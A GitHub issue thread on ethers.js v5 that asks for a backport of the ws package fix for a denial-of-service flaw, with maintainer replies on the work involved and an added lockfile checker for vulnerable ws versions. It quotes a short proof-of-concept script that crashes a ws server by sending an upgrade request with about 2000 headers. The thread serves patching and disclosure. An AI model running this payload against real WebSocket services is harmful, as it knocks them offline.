ethers-io / ethers.js

Complete Ethereum library and wallet implementation in JavaScript.
https://ethers.org/
MIT License

Fix DoS vulnerability caused by `ws` dependency on v5 #4791

Open cgero-eth opened 1 month ago

cgero-eth commented 1 month ago

Ethers Version

5.7.2

Search Terms

ws, vulnerability, DoS, v5

Describe the Problem

Ethers.js v5.7.2 depends on a vulnerable version of the ws package. The vulnerability allows a DoS attack. The ws package must be updated to version >= 8.17.1 to fix the vulnerability.

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

Code Snippet

From Dependabot:

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Contract ABI

N/A

Errors

N/A

Environment

Ethereum (mainnet/ropsten/rinkeby/goerli), Altcoin - Please specify (e.g. Polygon), node.js (v12 or newer), Browser (Chrome, Safari, etc)

Environment (Other)

No response
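A defender-side check to go with the report above, as an added example (not code from the issue or from ethers.js): it walks the `packages` map of an npm package-lock.json (lockfileVersion 2 or 3) and flags every installed copy of ws below 8.17.1, the threshold the issue gives. The lockfile contents below are constructed for the example.

```javascript
// Added example (not from the ethers.js project): find installed copies of `ws`
// in a package-lock.json that are older than 8.17.1, the version the issue
// above names as the fix. Nested copies count too: a hoisted patched ws does
// not fix an old copy under some dependency's own node_modules.

const FIXED_WS_VERSION = '8.17.1'; // threshold taken from the issue text

// Compare two dotted version strings numerically (pre-release tags ignored).
// Returns -1, 0 or 1 like a comparator.
function compareSemver(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Return [{ path, version }] for each `ws` entry below FIXED_WS_VERSION.
// `lockfile` is the parsed JSON of a package-lock.json (lockfileVersion >= 2).
function findVulnerableWs(lockfile) {
  const packages = lockfile.packages || {};
  const hits = [];
  for (const [path, meta] of Object.entries(packages)) {
    // Only entries whose final path segment is the `ws` package itself.
    if (!path.endsWith('node_modules/ws') || !meta.version) continue;
    if (compareSemver(meta.version, FIXED_WS_VERSION) < 0) {
      hits.push({ path, version: meta.version });
    }
  }
  return hits;
}

// Constructed sample lockfile (not a real dependency tree): a hoisted patched
// ws plus an older nested copy under a hypothetical provider package.
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '1.0.0' },
    'node_modules/ws': { version: '8.17.1' },
    'node_modules/example-provider': { version: '1.2.3' },
    'node_modules/example-provider/node_modules/ws': { version: '7.4.6' },
  },
};

// Stand-alone run: prints each vulnerable copy with its path and version.
for (const h of findVulnerableWs(SAMPLE_LOCKFILE)) {
  console.log(`${h.path}: ws@${h.version} < ${FIXED_WS_VERSION}`);
}
```

To check a real project, replace SAMPLE_LOCKFILE with the parsed contents of its package-lock.json.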

ricmoo commented 1 month ago

Thanks for the snippet.

This was addressed when the exploit was announced in v6, but it certainly makes sense to port back into v5 as it is still widely used.

netzulo commented 3 weeks ago

lol, just a merge needed on v5? please, resolve this, easy to close :D

ricmoo commented 3 weeks ago

It’s not really “easy to close”… The v5 branch is 2.5 years old; I’ve spent the last week carefully updating the tests (migrating from Goerli to Sepolia, redeploying contracts, etc.), deployment scripts and other dev dependencies, though, and it is almost ready with the updated ws package. :)

It still has 650k downloads per week though, so it is important not to bork it and to make sure the change is well tested. :)

airdropross commented 2 days ago

Hey @ricmoo any status update here? We are also trying to patch this vulnerability in our codebase and would love to continue using your incredible ethers library!